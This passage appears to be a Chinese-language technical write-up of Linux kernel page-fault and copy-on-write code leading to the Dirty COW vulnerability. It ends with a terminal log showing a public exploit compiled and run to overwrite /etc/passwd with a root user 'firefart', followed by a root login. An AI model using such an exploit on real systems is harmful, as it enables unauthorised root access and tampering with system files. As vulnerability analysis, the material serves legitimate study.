/* * We fault-in kernel-space virtual memory on-demand. The * 'reference' page table is init_mm.pgd. * * NOTE! We MUST NOT take any locks for this case. We may * be in an interrupt or a critical region, and should * only copy the information from the master page table, * nothing more. * * This verifies that the fault happens in kernel space * (error_code & 4) == 0, and that the fault was not a * protection error (error_code & 9) == 0. */ if (unlikely(fault_in_kernel_space(address))) { if (!(error_code & (PF_RSVD | PF_USER | PF_PROT))) {//三个标志位都无说明是内核触发的内核空间的缺页异常 if (vmalloc_fault(address) >= 0) return;
这部分先判断触发 page fault 的地址是否位于内核地址空间;如果是,并且错误码中 PF_RSVD、PF_USER、PF_PROT 三个标志位都没有置位(即内核态触发的内核空间缺页),则交给 vmalloc_fault() 处理。
1 2 3
/* Can handle a stale RO->RW TLB: */ if (spurious_fault(error_code, address)) return;
内核空间的 page fault 也可能是虚假的(spurious):页表项的权限已经从只读改为可写,但 TLB 中仍残留着尚未刷新的旧表项,访问时就会触发这种虚假的 page fault。
1 2 3 4 5
/* * Don't take the mm semaphore here. If we fixup a prefetch * fault we could otherwise deadlock: */ bad_area_nosemaphore(regs, error_code, address);
非法地址访问产生的异常,比如用户态访问kernel的地址
1 2
if (unlikely(error_code & PF_RSVD)) pgtable_bad(regs, error_code, address);
从这里开始处理的是发生在用户空间地址上的缺页;首先检查错误码中的 PF_RSVD 标志位,若被置位则按页表错误处理(pgtable_bad)。
1 2 3 4
if (unlikely(smap_violation(error_code, regs))) { bad_area_nosemaphore(regs, error_code, address); return; }
这里处理的是 SMAP 违例,即内核态访问用户空间地址时触发的异常,直接按非法访问处理(bad_area_nosemaphore)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
/* * It's safe to allow irq's after cr2 has been saved and the * vmalloc fault has been handled. * * User-mode registers count as a user access even for any * potential system fault or CPU buglet: */ if (user_mode(regs)) { local_irq_enable(); error_code |= PF_USER; flags |= FAULT_FLAG_USER; } else { if (regs->flags & X86_EFLAGS_IF) local_irq_enable(); }
如果 page fault 是在用户态触发的,则开启中断,并设置表示“用户态访问”的标志位(PF_USER 和 FAULT_FLAG_USER);否则只有在 regs->flags 中 X86_EFLAGS_IF 置位时才重新开启中断。
1 2
if (error_code & PF_WRITE) flags |= FAULT_FLAG_WRITE;
如果缺页异常是由写操作引起的(PF_WRITE 置位),则设置 FAULT_FLAG_WRITE 标志。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
if (unlikely(!down_read_trylock(&mm->mmap_sem))) { if ((error_code & PF_USER) == 0 && !search_exception_tables(regs->ip)) { bad_area_nosemaphore(regs, error_code, address); return; } retry: down_read(&mm->mmap_sem); } else { /* * The above down_read_trylock() might have succeeded in * which case we'll have missed the might_sleep() from * down_read(): */ might_sleep(); }
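这部分代码给进程的内存描述符(mm)加读锁(mmap_sem):先用 down_read_trylock() 尝试加锁;如果失败,且缺页不是用户态触发的、异常表中也找不到 regs->ip 对应的表项,则直接按非法访问处理;否则调用 down_read() 阻塞等待加锁。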
1 2 3 4 5 6 7
vma = find_vma(mm, address); if (unlikely(!vma)) { bad_area(regs, error_code, address); return; } if (likely(vma->vm_start <= address)) goto good_area;
if (reuse_swap_page(old_page)) { /* * The page is all ours. Move it to our anon_vma so * the rmap code will not search our parent or siblings. * Protected against the rmap code by the page lock. */ page_move_anon_rmap(old_page, vma, address); unlock_page(old_page); return wp_page_reuse(mm, vma, address, page_table, ptl, orig_pte, old_page, 0, 0); }
... retry: /* * If we have a pending SIGKILL, don't keep faulting pages and * potentially allocating memory. */ if (unlikely(fatal_signal_pending(current))) return i ? i : -ERESTARTSYS; cond_resched(); page = follow_page_mask(vma, start, foll_flags, &page_mask); if (!page) { int ret; ret = faultin_page(tsk, vma, start, &foll_flags, nonblocking); switch (ret) { case0: goto retry; ...
[test@localhost ~]$ gcc -pthread pwn.c -o dirty -lcrypt [test@localhost ~]$ ls dirty pwn.c [test@localhost ~]$ ./dirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: Complete line: firefart:fik57D3GJz/tk:0:0:pwned:/root:/bin/bash
mmap: 7fb864ede000 madvise 0
ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can login with the username 'firefart' and the password 'firefart'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd [test@localhost ~]$ su firefart Password: [firefart@localhost test]#